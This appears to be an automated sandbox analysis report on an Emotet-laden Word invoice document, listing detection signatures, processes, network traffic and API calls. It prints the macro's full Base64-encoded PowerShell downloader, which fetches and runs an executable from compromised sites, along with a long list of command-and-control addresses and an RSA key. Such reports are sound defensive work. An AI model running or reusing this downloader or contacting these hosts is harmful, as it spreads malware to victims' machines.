Loading ...

Play interactive tourEdit tour

Analysis Report INV_226554.doc

Overview

General Information

Sample Name:INV_226554.doc
Analysis ID:286595
MD5:b30424f6bd5580a79cb62f1f98baba60
SHA1:f94d01885af24341f210f45239e95fcdd0b02f06
SHA256:29e6800b32fe83e4c3eea894351d851e0ba7013aa256aa96ca27b0423fe084d8

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 2532 cmdline: powershell -e JABVADkAcABmAHcAeQBqAD0AKAAoACcAQgA2ACcAKwAnAF8AJwApACsAKAAnAG8AOABfACcAKwAnAHAAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AVgA6AHUAUwBlAHIAUABSAG8ARgBJAEwAZQBcAEsAWABmAEUARAAxADQAXABEAFMANQA4ADMAUgBoAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAEUAYwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAHUAUgBgAGkAYABUAHkAUAByAG8AdABPAGMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACkAKwAoACcAMgAsACcAKwAnACAAdABsAHMAJwArACcAMQAxACcAKQArACgAJwAsACAAJwArACcAdAAnACkAKwAnAGwAJwArACcAcwAnACkAOwAkAFMAYQBrAGYAegBuAHoAIAA9ACAAKAAoACcAVQAnACsAJwBpADAAaQAnACkAKwAoACcANgBtACcAKwAnADYAJwApACkAOwAkAEkAbwBqAGgAMgBqAGEAPQAoACgAJwBWAF8AJwArACcAbgAzADAAdAAnACkAKwAnAHUAJwApADsAJABNAGYAagBuAHoAdQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAJwArACgAJwBLAGsASwB4ACcAKwAnAGYAZQBkACcAKwAnADEANAA5AEsAawBEAHMAJwApACsAJwA1ADgAJwArACgAJwAzAHIAJwArACcAaAA5AEsAJwArACcAawAnACkAKQAgAC0AcgBlAFAAbABBAGMAZQAgACgAJwA5ACcAKwAnAEsAawAnACkALABbAEMASABBAFIAXQA5ADIAKQArACQAUwBhAGsAZgB6AG4AegArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEsAdwBjAGkAMgBvADkAPQAoACcAQgB0ACcAKwAoACcAZQAnACsAJwB1AHQAMABxACcAKQApADsAJABIAGoAOAA3AGwANgBiAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAHcARQBCAGMATABJAEUAbgB0ADsAJABEAGkAeAB6AG8AZwBlAD0AKAAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAJwA6AC8ALwBjACcAKwAnAGEAJwArACcAcwAnACkAKwAoACcAZQAuAGcAJwArACcAbwAnACkAKwAoACcAbgAnACsAJwB1AGsAawBhAGQALgBjACcAKQArACcAbwBtACcAKwAnAC8AJwArACcAcwAnACsAKAAnAHkAcwAnACsAJwAtAGMAYQAnACkAKwAoACcAYwBoAGUALwAnACsAJwBDACcAKQArACgAJwBqACcAKwAnAFQALwAqAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAJwBzADoAJwArACgAJwAvAC8AcwAnACsAJwB0AGEAcgAnACsAJwByAGMAbwAnACsAJwBpAG4ALgAnACsAJwBuACcAKQArACcAZQAnACsAKAAnAHQALwAnACsAJwB3AHAALQBhAGQAbQBpAG4AJwArACcALwBZACcAKwAnAFQALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvACcAKwAnAG0AbwBkAGUAbABhAHcAJwArACcALgBkACcAKwAnAGUAdgAnACkAKwAoACcAawBpACcAKwAnAG4AZAAnACkAKwAoACcALgBjACcAKwAnAG8AbQAuACcAKQArACgAJwBhAHUAJwArACcALwB3ACcAKQArACgAJwBwAC0AJwArACcAYQBkACcAKQArACgAJwBtAGkAJwArACcAbgAnACsAJwAvAGMAJwArACcAdgBEACcAKwAnAFIAbQBHAEsALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAZABwAHIAawBwAC4AJwArACcAcAAnACkAKwAnAGEAbAAnACsAKAAnAGUAbQBiAGEAbgAnACsAJwBnACcAKQArACcALgAnACsAJwBnACcAKwAoACcAbwAuACcAKwAnAGkAZAAvAHMAeQBzAC0AJwArACcAYwBhACcAKwAnAGMAJwApACsAKAAnAGgAZQAvADcAJwArACcAWQA0AGEAJwApACsAKAAnAEgAJwArACcAdwAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAHAAbABlAHQAZQBnACcAKQArACgAJwB1ACcAKwAnAGkAZABlAGIAJwApACsAJwBsACcAKwAnAG8AZwAnACsAJwBnACcAKwAoACcAaQBuACcAKwAnAGcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBlAHUAaQBvAHQAJwApACsAKAAnAC8AUABBACcAKwAnAHUASgBHACcAKQArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AcQAnACsAJwB1AHQAaQAnACsAJwBjAGgAZQAnACkAKwAoACcALgBjACcAKwAnAG4AJwApACsAKAAnAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAnAGQAJwArACcAbQAnACsAKAAnAGkAbgAnACsAJwAvACcAKQArACgAJwBRAC8AJwArACcAKgBoAHQAJwArACcAdABwAHMAOgAvAC8AcwAnACkAKwAoACcAaABpAHYAYQAtACcAKwAnAGUAbgAnACsAJwBnAGkAbgBlACcAKwAnAGUAcgAnACsAJwBpAG4AJwArACcAZwAuAGMAbwBtACcAKwAnAC8AMQBjACcAKwAnAGoALwB0AEsAJwArACcAZQAnACkAKwAoACcAbQBIACcAKwAnAFYAJwApACsAJwA3AC8AJwApAC4AIgBTAGAAcABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMAeQA1AGgAcABiADQAPQAoACcAVwAxACcAKwAoACcAdgA5ACcAKwAnAHgAJwApACsAJwB5AGwAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUQByAG8AbQA2AGEAcgAgAGkAbgAgACQARABpAHgAegBvAGcAZQApAHsAdAByAHkAewAkAEgAagA4ADcAbAA2AGIALgAiAGQAYABPAFcAbgBMAG8AQQBgAEQARgBgAEkATABlACIAKAAkAFEAcgBvAG0ANgBhAHIALAAgACQATQBmAGoAbgB6AHUAZgApADsAJABSAGgANQBpAGsAeABfAD0AKAAnAE0AZQAnACsAKAAnAGUAaABmAHEAJwArACcAMQAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABNAGYAagBuAHoAdQBmACkALgAiAGwARQBgAE4AYABnAHQAaAAiACAALQBnAGUAIAAzADYAOQAzADEAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAoACQATQBmAGoAbgB6AHUAZgApADsAJABYAHoAawB6AG0AbQBuAD0AKAAoACcARwAnACsAJwBuAGEANQAnACkAKwAnAF8AJwArACcAcwBwACcAKQA7AGIAcgBlAGEAawA7ACQAVwA3AGwAZgBoAGcAcQA9ACgAKAAnAFcAMgBrACcAKwAnADgAdwB5ACcAKQArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFMAcAAxAF8AYQB1AG0APQAoACcATQAnACsAKAAnAHEAYgBqAF8AJwArACcAZQByACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • Ui0i6m6.exe (PID: 960 cmdline: 'C:\Users\user\Kxfed14\Ds583rh\Ui0i6m6.exe' MD5: 2F027092A8B72AD23326185FFC1A1FFB)
      • devenum.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\prevhost\devenum.exe MD5: 2F027092A8B72AD23326185FFC1A1FFB)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080", "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80", "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080", "50.91.114.38:80", "200.123.150.89:443", "121.124.124.40:7080", "62.75.141.82:80", "5.196.74.210:8080", "24.137.76.62:80", "85.105.205.77:8080", "139.130.242.43:80", "82.225.49.121:80", "110.145.77.103:80", "195.251.213.56:80", "46.105.131.79:8080", "87.106.136.232:8080", "75.139.38.211:80", "124.41.215.226:80", "203.153.216.189:7080", "162.241.242.173:8080", "219.74.18.66:443", "174.45.13.118:80", "68.188.112.97:80", "200.114.213.233:8080", "213.196.135.145:80", "61.92.17.12:80", "61.19.246.238:443", "219.75.128.166:80", "120.150.60.189:80", "123.176.25.234:80", "1.221.254.82:80", "137.119.36.33:80", "94.23.237.171:443", "74.120.55.163:80", "62.30.7.67:443", "104.131.11.150:443", "139.59.67.118:443", "209.141.54.221:8080", "79.137.83.50:443", "84.39.182.7:80", "97.82.79.83:80", "87.106.139.101:8080", "94.1.108.190:443", "37.187.72.193:8080", "139.162.108.71:8080", "93.147.212.206:80", "74.134.41.124:80", "103.86.49.11:8080", "75.80.124.4:80", "109.74.5.95:8080", "153.232.188.106:80", "168.235.67.138:7080", "50.35.17.13:80", "42.200.107.142:80", "82.80.155.43:80", "78.24.219.147:8080", "24.43.99.75:80", "107.5.122.110:80", "156.155.166.221:80", "83.169.36.251:8080", "47.144.21.12:443", "79.98.24.39:8080", "181.169.34.190:80", "139.59.60.244:8080", "85.152.162.105:80", "185.94.252.104:443", "110.5.16.198:80", "174.102.48.180:443", "140.186.212.146:80", "95.179.229.244:8080", "104.32.141.43:80", "169.239.182.217:8080", "121.7.127.163:80", "94.200.114.161:80", "201.173.217.124:443", "104.131.44.150:8080", "137.59.187.107:8080", "5.39.91.110:7080", "203.117.253.142:80", "157.245.99.39:8080", "176.111.60.55:8080", "95.213.236.64:8080", "220.245.198.194:80", "37.139.21.175:8080", "89.216.122.92:80", "139.99.158.11:443", "24.179.13.119:80", "188.219.31.12:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2155228913.0000000000251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.2347834119.0000000000250000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.2155254458.0000000000274000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000005.00000002.2347858587.0000000000264000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.2347874608.0000000000281000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.Ui0i6m6.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              5.2.devenum.exe.280000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: INV_226554.docAvira: detected
                Found malware configurationShow sources
                Source: 00000005.00000002.2347834119.0000000000250000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080", "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80", "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080", "50.91.114.38:80", "200.123.150.89:443", "121.124.124.40:7080", "62.75.141.82:80", "5.196.74.210:8080", "24.137.76.62:80", "85.105.205.77:8080", "139.130.242.43:80", "82.225.49.121:80", "110.145.77.103:80", "195.251.213.56:80", "46.105.131.79:8080", "87.106.136.232:8080", "75.139.38.211:80", "124.41.215.226:80", "203.153.216.189:7080", "162.241.242.173:8080", "219.74.18.66:443", "174.45.13.118:80", "68.188.112.97:80", "200.114.213.233:8080", "213.196.135.145:80", "61.92.17.12:80", "61.19.246.238:443", "219.75.128.166:80", "120.150.60.189:80", "123.176.25.234:80", "1.221.254.82:80", "137.119.36.33:80", "94.23.237.171:443", "74.120.55.163:80", "62.30.7.67:443", "104.131.11.150:443", "139.59.67.118:443", "209.141.54.221:8080", "79.137.83.50:443", "84.39.182.7:80", "97.82.79.83:80", "87.106.139.101:8080", "94.1.108.190:443", "37.187.72.193:8080", "139.162.108.71:8080", "93.147.212.206:80", "74.134.41.124:80", "103.86.49.11:8080", "75.80.124.4:80", "109.74.5.95:8080", "153.232.188.106:80", "168.235.67.138:7080", "50.35.17.13:80", "42.200.107.142:80", "82.80.155.43:80", "78.24.219.147:8080", "24.43.99.75:80", "107.5.122.110:80", "156.155.166.221:80", "83.169.36.251:8080", "47.144.21.12:443", "79.98.24.39:8080", "181.169.34.190:80", "139.59.60.244:8080", "85.152.162.105:80", "185.94.252.104:443", "110.5.16.198:80", "174.102.48.180:443", "140.186.212.146:80", "95.179.229.244:8080", "104.32.141.43:80", "169.239.182.217:8080", "121.7.127.163:80", "94.200.114.161:80", "201.173.217.124:443", "104.131.44.150:8080", "137.59.187.107:8080", "5.39.91.110:7080", "203.117.253.142:80", "157.245.99.39:8080", "176.111.60.55:8080", "95.213.236.64:8080", "220.245.198.194:80", "37.139.21.175:8080", "89.216.122.92:80", "139.99.158.11:443", "24.179.13.119:80", "188.219.31.12:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}
                Multi AV Scanner detection for domain / URLShow sources
                Source: case.gonukkad.comVirustotal: Detection: 7%Perma Link
                Source: http://dprkp.palembang.go.id/sys-cache/7Y4aHw/Virustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeVirustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: INV_226554.docVirustotal: Detection: 62%Perma Link
                Source: INV_226554.docReversingLabs: Detection: 34%
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_00403690 CryptAcquireContextA,CryptAcquireContextA,4_2_00403690
                Source: C:\Windows\SysWOW64\prevhost\devenum.exeCode function: 5_2_002825A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,5_2_002825A0
                Source: C:\Windows\SysWOW64\prevhost\devenum.exeCode function: 5_2_00282210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,5_2_00282210
                Source: C:\Windows\SysWOW64\prevhost\devenum.exeCode function: 5_2_00281FA0 CryptDuplicateHash,CryptDestroyHash,memcpy,CryptVerifySignatureW,CryptDecrypt,5_2_00281FA0
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_004366D0 FindFirstFileA,FindClose,4_2_004366D0
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,4_2_004356B4
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_002538B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_002538B0
                Source: C:\Windows\SysWOW64\prevhost\devenum.exeCode function: 5_2_002838B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,5_2_002838B0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: global trafficDNS query: name: case.gonukkad.com
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 128.199.16.135:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 128.199.16.135:443
                Source: global trafficHTTP traffic detected: GET /sys-cache/7Y4aHw/ HTTP/1.1Host: dprkp.palembang.go.idConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.201.10.61 185.201.10.61
                Source: Joe Sandbox ViewIP Address: 157.230.44.117 157.230.44.117
                Source: Joe Sandbox ViewIP Address: 128.199.16.135 128.199.16.135
                Source: Joe Sandbox ViewASN Name: UCCS-UNIVERSITY-OF-COLORADO-COLORADO-SPRINGSUS UCCS-UNIVERSITY-OF-COLORADO-COLORADO-SPRINGSUS
                Source: global trafficHTTP traffic detected: POST /2ZZ2YEZCC3YCR8f/YCAstcVGXXd/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.219.172.26/2ZZ2YEZCC3YCR8f/YCAstcVGXXd/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------waKsDZVzOpDUHl5DcFwHost: 74.219.172.26Content-Length: 4468Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: unknownTCP traffic detected without corresponding DNS query: 74.219.172.26
                Source: C:\Windows\SysWOW64\prevhost\devenum.exeCode function: 5_2_00282900 HttpQueryInfoW,InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,5_2_00282900
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{68ACA82A-6F93-4194-97B0-E6749671AC21}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /sys-cache/7Y4aHw/ HTTP/1.1Host: dprkp.palembang.go.idConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: case.gonukkad.com
                Source: unknownHTTP traffic detected: POST /2ZZ2YEZCC3YCR8f/YCAstcVGXXd/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.219.172.26/2ZZ2YEZCC3YCR8f/YCAstcVGXXd/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------waKsDZVzOpDUHl5DcFwHost: 74.219.172.26Content-Length: 4468Cache-Control: no-cache
                Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
                Source: Ui0i6m6.exe, 00000004.00000002.2157537366.0000000002C80000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2349220019.0000000003990000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
                Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
                Source: Ui0i6m6.exe, 00000004.00000002.2157537366.0000000002C80000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2349220019.0000000003990000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
                Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_0040BDF0 GetPropA,GetClientRect,CreateCompatibleDC,CreateCompatibleBitmap,SendMessageA,SendMessageA,BitBlt,GetMessagePos,GetDCEx,GetWindowDC,ReleaseDC,CallWindowProcA,4_2_0040BDF0
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_00434637 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00434637
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_004446A5 GetKeyState,GetKeyState,GetKeyState,4_2_004446A5
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_0043294D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_0043294D
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_004409EE ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,4_2_004409EE
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_00447A61 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,4_2_00447A61
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_00447A76 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,4_2_00447A76
                Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exeCode function: 4_2_0042DD8A __EH_prolog,GetKeyState,GetKeyState,GetKeyState,